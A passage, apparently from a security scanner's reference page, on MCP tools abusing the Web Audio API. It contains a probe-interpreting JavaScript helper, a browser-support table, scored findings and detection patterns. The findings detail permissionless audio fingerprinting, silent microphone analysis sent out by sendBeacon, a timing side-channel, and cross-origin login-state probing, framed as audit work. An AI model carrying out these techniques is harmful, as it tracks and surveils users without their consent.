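function interpretProbe({ durationSeconds, rms, silenceThreshold = 0.01 }) {
  const hasContent = Number.isFinite(durationSeconds) && durationSeconds > 0;
  if (!hasContent) return 'no-content';
  return rms < silenceThreshold
    ? 'content-present-graph-silenced' // duration > 0 and RMS ≈ 0
    : 'content-present-graph-readable'; // duration > 0 and RMS > 0
}

console.log(interpretProbe({ durationSeconds: NaN, rms: 0 }));    // no-content
console.log(interpretProbe({ durationSeconds: 12.5, rms: 0 }));   // content-present-graph-silenced
console.log(interpretProbe({ durationSeconds: 12.5, rms: 0.2 })); // content-present-graph-readable
```

Writing the cases out this way also shows where the inference is weakest: a response with genuinely silent audio is indistinguishable from a CORS-silenced one on these two values alone.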

Browser support

Browser / Platform | Web Audio API | AudioWorklet | Permission required | Notes
Chrome 66+ (desktop + Android) | Full support | Full support (Chrome 66+) | None for OfflineAudioContext fingerprinting; getUserMedia for mic analysis | OfflineAudioContext fingerprint stable. AudioWorklet available. SharedArrayBuffer requires COOP/COEP headers. getFrequencyResponse() exposed without jitter.
Firefox 76+ (desktop + Android) | Partial (fingerprint resistance) | Full support (Firefox 76+) | None for OfflineAudioContext; getUserMedia for mic | Firefox fingerprinting resistance mode (privacy.resistFingerprinting) quantizes AudioContext output, reducing fingerprint entropy. Default Firefox does NOT apply this; only strict mode does. AudioWorklet fully supported.
Safari / WebKit (iOS 14.5+, macOS) | Full support | Full support (Safari 14.1+) | None for OfflineAudioContext; getUserMedia for mic | OfflineAudioContext renders hardware-specific float32 values. Apple Silicon (M1/M2/M3) produces distinct fingerprints from Intel Macs. Safari 14.1+ supports AudioWorklet. getUserMedia on iOS requires HTTPS.
Electron (all platforms) | Full support | Full support | None for OfflineAudioContext; app-defined for mic | Electron apps often grant microphone access at OS level. SharedArrayBuffer available by default (COOP/COEP configurable). AudioWorklet timing side-channel highly effective in Electron due to consistent audio thread scheduling.
Edge (Chromium-based) | Full support | Full support | None for OfflineAudioContext; getUserMedia for mic | Identical to Chrome (Chromium-based). Edge Tracking Prevention does not mitigate AudioContext fingerprinting in default mode.

SkillAudit findings

Critical (−30 pts): MCP tool creates an OfflineAudioContext(1, 1764, 44100), connects OscillatorNode (10 kHz) through DynamicsCompressorNode to destination, calls startRendering(), and hashes the resulting float32 buffer via a reduce sum. Combines with BiquadFilterNode.getFrequencyResponse() query for a composite (oscillatorSum, biquadMagSum) hardware fingerprint. Requires zero permissions. Fingerprint is stable across sessions, private browsing, VPN changes, and cookie clears, distinguishing the device by CPU architecture and software platform.
High (−24 pts): MCP tool calls navigator.mediaDevices.getUserMedia({audio: true}) using a previously granted persistent permission, routes the resulting MediaStream into a MediaStreamAudioSourceNode connected to an AnalyserNode (fftSize 2048), and polls getByteFrequencyData() at 30Hz. Classifies each 33ms frame into silence, voiced, speech, music, or ambient categories using four-band energy thresholds. Exfiltrates running spectrogram and voice activity detection history via sendBeacon every 5 seconds. Analysis runs without secondary OS permission prompt.
Medium (−12 pts): MCP tool loads an AudioWorkletProcessor that compares consecutive process() invocations against the expected 128/44100 ≈ 2.902ms audio-quantum duration, accumulating timing drift into a SharedArrayBuffer. Main thread samples drift once per second to compute a CPU load indicator with sub-millisecond resolution, bypassing the 1ms jitter mitigation applied to performance.now(). Load variance over 30 seconds reveals intermittent CPU/GPU spikes attributable to other MCP tools, browser extensions, or background OS processes.
Medium (−12 pts): MCP tool creates hidden <audio> elements pointing to cross-origin authentication-gated URLs, connects each via createMediaElementSource() to an AnalyserNode, and measures mean RMS energy from getByteFrequencyData(). Cross-references CORS-probe RMS (zero when blocked, non-zero when CORS-open) with no-cors audio.duration check (reports actual content presence regardless of CORS). Binary decision matrix infers whether user is authenticated to cross-origin payment, voicemail, or premium content services from audio activity alone.

SkillAudit check: SkillAudit's static analysis detects OfflineAudioContext instantiation combined with startRendering() and float32 buffer reduction (the canonical AudioFP pattern); flags getFrequencyResponse() calls on BiquadFilterNode used outside an audio playback context; identifies getUserMedia({audio}) streams connected to AnalyserNode without a corresponding destination connection (silent analysis); detects AudioWorkletProcessor subclasses that read currentTime and write to SharedArrayBuffer for cross-thread timing; and identifies createMediaElementSource on cross-origin <audio> elements with RMS measurement and remote exfiltration.
